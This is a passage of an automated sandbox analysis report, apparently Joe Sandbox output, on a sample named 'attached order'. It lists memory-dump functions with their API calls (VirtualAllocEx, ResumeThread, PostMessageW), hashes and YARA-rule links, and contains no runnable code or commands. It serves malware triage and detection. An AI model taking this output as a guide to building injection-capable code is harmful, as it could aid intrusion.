                                                                                          • Snapshot File: hcaresult_0_2_1ab0000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: FindWindow
                                                                                          • String ID:
                                                                                          • API String ID: 134000473-0
                                                                                          • Opcode ID: 3306859b533fa4d51d8ffda968eb4295681c6846171bd540df9010a4fd5290d7
                                                                                          • Instruction ID: 8321a5ff4e2a351fa930fea32944cd2d8454a0c345712db74e4b2c3121cd4f72
                                                                                          • Opcode Fuzzy Hash: 3306859b533fa4d51d8ffda968eb4295681c6846171bd540df9010a4fd5290d7
                                                                                          • Instruction Fuzzy Hash: 132110B58003498FDB14CF9AD884ADEFBF8FB48210F24852ED51AB7601D374A944CBA0
                                                                                          Function 09E55EDC Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,09E5845A,?,?,?,?,?), ref: 09E584FF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16561958916.0000000009E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_9e50000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFromIconResource
                                                                                          • String ID:
                                                                                          • API String ID: 3668623891-0
                                                                                          • Opcode ID: 4a00972b9a195dffa6feeb8aa9bcf1bc0a72320a92e05f6a2a9852862bd823de
                                                                                          • Instruction ID: 7107074dc41f95d91aba9071a741470186e3713539bf8af9f3472b80f0c5e919
                                                                                          • Opcode Fuzzy Hash: 4a00972b9a195dffa6feeb8aa9bcf1bc0a72320a92e05f6a2a9852862bd823de
                                                                                          • Instruction Fuzzy Hash: FD1126B28003499FCB10DFAAC844BEEBFF8EB48324F14841AE915A7250C375A954DFA5
                                                                                          Function 0A3209E8 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A320A5E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562593674.000000000A320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A320000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a320000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          • Opcode ID: 78ff4826c48c95f4821160e3f8518ee40be016ebdf27f49856041e04bf526ad8
                                                                                          • Instruction ID: 4e4749f6652ce88dc82bcedadb040ed7a32ac9b7d68987df459a4aad74575080
                                                                                          • Opcode Fuzzy Hash: 78ff4826c48c95f4821160e3f8518ee40be016ebdf27f49856041e04bf526ad8
                                                                                          • Instruction Fuzzy Hash: 961144728002499FCB14DFAAD844ADEFFF5EF88320F248819E519A7250C779A954CFA4
                                                                                          Function 0A3209F0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A320A5E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562593674.000000000A320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A320000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a320000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          • Opcode ID: 4b373947aa718cc9c396d596bffd867d1cb878f76d8d8e1e560af3a0d973b790
                                                                                          • Instruction ID: b6c627f59143b469ce5a034288ef2c6f56b5eeba83fe3dd397a1a9155a9d5da8
                                                                                          • Opcode Fuzzy Hash: 4b373947aa718cc9c396d596bffd867d1cb878f76d8d8e1e560af3a0d973b790
                                                                                          • Instruction Fuzzy Hash: 0F1126728002499FCB14DFAAC844ADEBBF5AF48320F248819E515A7250C779A954CFA0
                                                                                          Function 0A320860 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562593674.000000000A320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A320000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a320000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: ResumeThread
                                                                                          • String ID:
                                                                                          • API String ID: 947044025-0
                                                                                          • Opcode ID: 456e5050b145f2d4c33bc6bcca700b694258a4e4c4c4d2961e71bcb369a21320
                                                                                          • Instruction ID: 95558563300ef8d957cf2b3444cdfd60d1cc38cddcd4b7e5c56aa0d59d1f1015
                                                                                          • Opcode Fuzzy Hash: 456e5050b145f2d4c33bc6bcca700b694258a4e4c4c4d2961e71bcb369a21320
                                                                                          • Instruction Fuzzy Hash: 7A1134B29003498FDB14DFAAC4447DEFBF4AF48324F25882AD519A7640C778A948CFA4
                                                                                          Function 0A320868 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562593674.000000000A320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A320000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a320000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: ResumeThread
                                                                                          • String ID:
                                                                                          • API String ID: 947044025-0
                                                                                          • Opcode ID: bfc6bba9998012c8522367bdbcd9eb630d4cfbaf309cc944a7b8d8c8d4a8c302
                                                                                          • Instruction ID: fa71ef83f7c74926379e73d171fbf6d6e8896f21a224dcf5916aa47e002d32a8
                                                                                          • Opcode Fuzzy Hash: bfc6bba9998012c8522367bdbcd9eb630d4cfbaf309cc944a7b8d8c8d4a8c302
                                                                                          • Instruction Fuzzy Hash: 241128B1D003498FDB14DFAAC4447DEFBF5AB48324F258819D519B7640C778A944CFA4
                                                                                          Function 05A30C38 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 05A30C9E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16560737399.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5a30000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule
                                                                                          • String ID:
                                                                                          • API String ID: 4139908857-0
                                                                                          • Opcode ID: dd0dbad91b8d0fdf4d37b917502d011492043c7520e1b0d95169d78ceefe3c18
                                                                                          • Instruction ID: ea1f9439b089e62b98a2f396427e3c57e7961feea439f479f1fb7f27b8234c14
                                                                                          • Opcode Fuzzy Hash: dd0dbad91b8d0fdf4d37b917502d011492043c7520e1b0d95169d78ceefe3c18
                                                                                          • Instruction Fuzzy Hash: 3211E3B5C043498FCB10CF9AC444ADEFBF4BB88314F25841AD469B7610D375A545CFA5
                                                                                          Function 0A323180 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PostMessageW.USER32(?,?,?,?), ref: 0A3231E5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562593674.000000000A320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A320000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a320000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessagePost
                                                                                          • String ID:
                                                                                          • API String ID: 410705778-0
                                                                                          • Opcode ID: bef39467f5c508438edb233b5607c8142d8887b4a00bc37d03a225752e5fa51d
                                                                                          • Instruction ID: 7eed1e1c6dfd3c954a84e061c6372b960a44caa71b4873a31887b399a3a08409
                                                                                          • Opcode Fuzzy Hash: bef39467f5c508438edb233b5607c8142d8887b4a00bc37d03a225752e5fa51d
                                                                                          • Instruction Fuzzy Hash: 2F1125B68002889FDB10CF9AC884BDEFFF4EB48310F248459D454B7200C3796544CFA0
                                                                                          Function 0A323188 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PostMessageW.USER32(?,?,?,?), ref: 0A3231E5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562593674.000000000A320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A320000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a320000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessagePost
                                                                                          • String ID:
                                                                                          • API String ID: 410705778-0
                                                                                          • Opcode ID: 9cbd33956c9af273aa598b96dca3f94b2676d5ea3c419c645529288091156c50
                                                                                          • Instruction ID: e00fb496f1d206ea13193e7a16f11437d3b52e7f851e8da9635e0e69ef6f7141
                                                                                          • Opcode Fuzzy Hash: 9cbd33956c9af273aa598b96dca3f94b2676d5ea3c419c645529288091156c50
                                                                                          • Instruction Fuzzy Hash: 3711D0B58003499FDB10DF9AC885BDEFBF8EB48324F21841AE559B7640C379A944CFA5
                                                                                          Function 0BA7B9C1 Relevance: 1.4, Strings: 1, Instructions: 120COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: r
                                                                                          • API String ID: 0-1812594589
                                                                                          • Opcode ID: d2bddcf30041d21729fa8446214d1f3a4758466452f2f539250a5f4537cebcf3
                                                                                          • Instruction ID: 4bbb9d4103c8c8e63ccba31e4c67e1fe9c86cfd7ca102a6a343217ccc04f71de
                                                                                          • Opcode Fuzzy Hash: d2bddcf30041d21729fa8446214d1f3a4758466452f2f539250a5f4537cebcf3
                                                                                          • Instruction Fuzzy Hash: 65414DB098D109EFCF04EF65C9A94FEB7BAFF4E701BA09095C42A57216C7309942CB61
                                                                                          Function 0BA70040 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: p-
                                                                                          • API String ID: 0-3944269765
                                                                                          • Opcode ID: a0bc2a084bea0fa502f84366e58895042cd5bd17bd9836a9df33c2e138914f24
                                                                                          • Instruction ID: 7ef4ffec55bd90c0de251bfa10b876df3dea1ca362e7bdb186490fc724bcbd3f
                                                                                          • Opcode Fuzzy Hash: a0bc2a084bea0fa502f84366e58895042cd5bd17bd9836a9df33c2e138914f24
                                                                                          • Instruction Fuzzy Hash: 1411003124430157EB35E72ADCA476BB7A6EFD0321F14C42ED95B466A8CF71A883C601
                                                                                          Function 09E5A21C Relevance: 1.3, APIs: 1, Instructions: 50COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,09E5AA79,?,?), ref: 09E5AC20
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16561958916.0000000009E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_9e50000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandle
                                                                                          • String ID:
                                                                                          • API String ID: 2962429428-0
                                                                                          • Opcode ID: f1948960d5a85420f4471c4630bc3384cb23f12195a6f2d6fe4fa4ece16487c5
                                                                                          • Instruction ID: be430eb071774d6aaab0415eebe93bf4f670821c081b226a7f4ff70b3ecbb6ff
                                                                                          • Opcode Fuzzy Hash: f1948960d5a85420f4471c4630bc3384cb23f12195a6f2d6fe4fa4ece16487c5
                                                                                          • Instruction Fuzzy Hash: 031125B18003498FCB60DF9AC484BDEFBF4EB58320F25842AD959A7340D378A944CFA5
                                                                                          Function 09E5ABC6 Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,09E5AA79,?,?), ref: 09E5AC20
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16561958916.0000000009E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_9e50000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandle
                                                                                          • String ID:
                                                                                          • API String ID: 2962429428-0
                                                                                          • Opcode ID: 279cc2828a7d12aa41c7c010a41cb13dc223bb2015e8675c0664a9ef4efba49a
                                                                                          • Instruction ID: c22a76f015e79d2bb1c74666a4a2cd023d6d8f5d064bfb7523f794bc844abcb6
                                                                                          • Opcode Fuzzy Hash: 279cc2828a7d12aa41c7c010a41cb13dc223bb2015e8675c0664a9ef4efba49a
                                                                                          • Instruction Fuzzy Hash: AF11F5B58002498FCB10DF9AC545BDEFBF4EB58320F25842AD959A7740D378A944CFA5
                                                                                          Function 0BA7D745 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Y0
                                                                                          • API String ID: 0-3716725488
                                                                                          • Opcode ID: 73784f9e4a237fc1d2a0fa825b19535b4c80ce9e9a77b8533a1c15fe6b3a81a3
                                                                                          • Instruction ID: 11ce4b2e9b68ed72c0a54fd54a758bf46e98a6c6030075d8ddb4eff2e39bdfbd
                                                                                          • Opcode Fuzzy Hash: 73784f9e4a237fc1d2a0fa825b19535b4c80ce9e9a77b8533a1c15fe6b3a81a3
                                                                                          • Instruction Fuzzy Hash: C41136B4A453588FDB50DF28D864BA9BBBBEB49300F00C4EAD44AE7254DB344E81CF11
                                                                                          Function 0BA7A261 Relevance: .3, Instructions: 283COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 30d54b2a5af3f19ee129733116e74aef9bba6352bbf2a459fae4890fb839d975
                                                                                          • Instruction ID: e36ed07111958eef7e5cf5cde31533d4499cc84e3090f5337c6f39a4b5bd8c46
                                                                                          • Opcode Fuzzy Hash: 30d54b2a5af3f19ee129733116e74aef9bba6352bbf2a459fae4890fb839d975
                                                                                          • Instruction Fuzzy Hash: 92B11734E49209DFDB45EFA8D8809EDBBB6FF89300F209529D419AB255D730AC46CF90
                                                                                          Function 0BA71B48 Relevance: .2, Instructions: 224COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: aa7d45b3ea34b3a24abf7882f9906578ad050ba463f648c4853a3d07f6a9d88d
                                                                                          • Instruction ID: 9059e3b5ff5349eb9d111b5fd9e66dcc5f3d923a430d4888ff9c80b71c0e6642
                                                                                          • Opcode Fuzzy Hash: aa7d45b3ea34b3a24abf7882f9906578ad050ba463f648c4853a3d07f6a9d88d
                                                                                          • Instruction Fuzzy Hash: 98A1D375910619DFCF14EF68C850A99FBB1FF49304F05C299E949BB215EB30AA89CF90
                                                                                          Function 0BA72C77 Relevance: .2, Instructions: 207COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ff0b91e8d1a6c9748ed24b554ec1725dc02a5e00ea7712df46a1dc6ec4ebcd4f
                                                                                          • Instruction ID: f3aabfd7c0db7fdebe26e14a0b62f688753792f3ae114fdaaed5c9f9cf14da6d
                                                                                          • Opcode Fuzzy Hash: ff0b91e8d1a6c9748ed24b554ec1725dc02a5e00ea7712df46a1dc6ec4ebcd4f
                                                                                          • Instruction Fuzzy Hash: 27814D74A49209CFCB04EFA8D954AEEBBF1FF8A300F1084A9D415A7355DB359D09CBA1
                                                                                          Function 0BA747BA Relevance: .2, Instructions: 185COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 06a9f6fcfb836114600a6e3aa7dc6d7ff430f3548a528a4213e2f72814c6ba09
                                                                                          • Instruction ID: 4e8c90f126b8ce1f78898b79518519624d5d9dd96731ebbf3df0be83e1c53021
                                                                                          • Opcode Fuzzy Hash: 06a9f6fcfb836114600a6e3aa7dc6d7ff430f3548a528a4213e2f72814c6ba09
                                                                                          • Instruction Fuzzy Hash: 01616C74D49208DFCB00EFA8E954AAEBBB5FF8D301F10906AD52AAB355DB345845CF90
                                                                                          Function 0BA7A038 Relevance: .2, Instructions: 180COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8aa1ec4cff6e50cec935201150ad54f95f42104a7b16db6e15d8bd9cbcb558da
                                                                                          • Instruction ID: ccd65f4c0664e4146c6fa080b5427d5aa1eeb9259033d251919a64724296dbc2
                                                                                          • Opcode Fuzzy Hash: 8aa1ec4cff6e50cec935201150ad54f95f42104a7b16db6e15d8bd9cbcb558da
                                                                                          • Instruction Fuzzy Hash: 6671D474E09208EFDF04DFE9D9846EEBBB6BF89300F20902AD41AAB354D7315945CB50
                                                                                          Function 0BA747C8 Relevance: .2, Instructions: 167COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 99f266acfe572935289f79541ae595771c2971504393bc5d881e6a76b7802244
                                                                                          • Instruction ID: 2a584ff2af2af5964d59e9d8d5ff22bd4bfaea71960578d13baedb292e8f867b
                                                                                          • Opcode Fuzzy Hash: 99f266acfe572935289f79541ae595771c2971504393bc5d881e6a76b7802244
                                                                                          • Instruction Fuzzy Hash: 2F616A74E49208DFCB04EFA9E954AAEBBB6FF8C301F10902AD526A7355DB345841CF94
                                                                                          Function 0BA71B3B Relevance: .2, Instructions: 166COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 59a3722eb82947e8c8644653185d41ecde429fada4a3b7d5c50c3d2aaf395b3c
                                                                                          • Instruction ID: aee83c77f630432b5c134445287c2ee4bd67b9805c31626d2cabc4008effd41d
                                                                                          • Opcode Fuzzy Hash: 59a3722eb82947e8c8644653185d41ecde429fada4a3b7d5c50c3d2aaf395b3c
                                                                                          • Instruction Fuzzy Hash: 86710975900619DFDB14EF68C840A99FBB1FF49314F05C299D949BB315EB30AA89CF90
                                                                                          Function 0BA748A4 Relevance: .2, Instructions: 157COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e7dfb3687eda4bd0cdfc093d5d6a0bcfd48fc5916b65e06d0a2324f0621e9fc5
                                                                                          • Instruction ID: 65296034f95d2e766956fdd807bdb1fe7f36a6c9117fb56ccf24cce5fcac4368
                                                                                          • Opcode Fuzzy Hash: e7dfb3687eda4bd0cdfc093d5d6a0bcfd48fc5916b65e06d0a2324f0621e9fc5
                                                                                          • Instruction Fuzzy Hash: F9612574E49208DFCB00EFA8E994AAEBBB5FF4C301F10502AD526A7345EB345845CFA4
                                                                                          Function 0BA7A036 Relevance: .2, Instructions: 156COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 08eeae7d9033a881df063dd926fab30bc3e90502a4650ad42aebc522806a313e
                                                                                          • Instruction ID: dc931b7d367e2cf21c1bc49fec44160e6f0477800a22bb2e3f5c1e7ff16c403b
                                                                                          • Opcode Fuzzy Hash: 08eeae7d9033a881df063dd926fab30bc3e90502a4650ad42aebc522806a313e
                                                                                          • Instruction Fuzzy Hash: B451C274E45208EFDF08DFE9D9446EEBBB6BF89300F20802AD519AB354DB715906CB50
                                                                                          Function 0BA7A828 Relevance: .1, Instructions: 137COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 03e694b156dd140596911328d4d6c5c15f72a2b22592842721a3fbca701ea57e
                                                                                          • Instruction ID: 942253705230a77613c9d87e89204a6c7950f9a6cec288f42a909d1e1bcaaf5c
                                                                                          • Opcode Fuzzy Hash: 03e694b156dd140596911328d4d6c5c15f72a2b22592842721a3fbca701ea57e
                                                                                          • Instruction Fuzzy Hash: 77416834E49208AFDF08EFAAC8446EEBBF6EF8D301F15D069D019A7251D7344842CB54
                                                                                          Function 0BA77838 Relevance: .1, Instructions: 102COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5114bfb255f7ef690f6da795ba03f5386505fb12e2dcba8409730a6a4a38daf1
                                                                                          • Instruction ID: 04a6220c17baac23e01dee740f80415d514700b9820cf9031a605a2552bbb9ee
                                                                                          • Opcode Fuzzy Hash: 5114bfb255f7ef690f6da795ba03f5386505fb12e2dcba8409730a6a4a38daf1
                                                                                          • Instruction Fuzzy Hash: 48412974E49208DFDF05EFA9C944AAEBBF6EF88300F108069D815A7355DB349C81CBA0
                                                                                          Function 0BA75F80 Relevance: .1, Instructions: 102COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 652bc9740efa2fd99056ec772134bb96d897e35a494202fbf1d1ab90d82121fb
                                                                                          • Instruction ID: a78e0fd52e478be0783c249daa300b39e6896e7cd9894f7e57e0bbb18553b542
                                                                                          • Opcode Fuzzy Hash: 652bc9740efa2fd99056ec772134bb96d897e35a494202fbf1d1ab90d82121fb
                                                                                          • Instruction Fuzzy Hash: 9F314571949388AFCF01EFADD9107EEBFF5EF81310F24849AD409A7242CA344909CB61
                                                                                          Function 0BA757C8 Relevance: .1, Instructions: 102COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fc6ed3e2bc6e55233d7b1133e7ace59faf4c0332c416e97f529edfbb1c782e04
                                                                                          • Instruction ID: 8707e201da9fb48a551d418dd4e40ebc92b9f5a7e04b13068ec9ddbc0e114f8d
                                                                                          • Opcode Fuzzy Hash: fc6ed3e2bc6e55233d7b1133e7ace59faf4c0332c416e97f529edfbb1c782e04
                                                                                          • Instruction Fuzzy Hash: 81414774E09208DFCF04EFA9D854AEEBBB6FF98310F108469E515A7394D7345941CBA0
                                                                                          Function 0BA757B8 Relevance: .1, Instructions: 101COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9f5edee570dfcab4d141aa5b20f9fddfb55f33955c92be67324ec606fbc903c6
                                                                                          • Instruction ID: 94eed2ecffe733fa9764eb75ced122f4314b9d682a52a5da6158f18f9fd2e9c6
                                                                                          • Opcode Fuzzy Hash: 9f5edee570dfcab4d141aa5b20f9fddfb55f33955c92be67324ec606fbc903c6
                                                                                          • Instruction Fuzzy Hash: 91415874E09248DFCF04EFA9D8446EEBBB2FF99300F1484AAE415A7291D7345945CBA0
                                                                                          Function 0BA76390 Relevance: .1, Instructions: 95COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ccd64571b552b6bdb10b57e77f561ff66ec14c9e264fee7c672066a7e502b96e
                                                                                          • Instruction ID: 1ca045367ddc7d5d241300aba5bae8798d68a2c20cdc98d09aa00d82023ba906
                                                                                          • Opcode Fuzzy Hash: ccd64571b552b6bdb10b57e77f561ff66ec14c9e264fee7c672066a7e502b96e
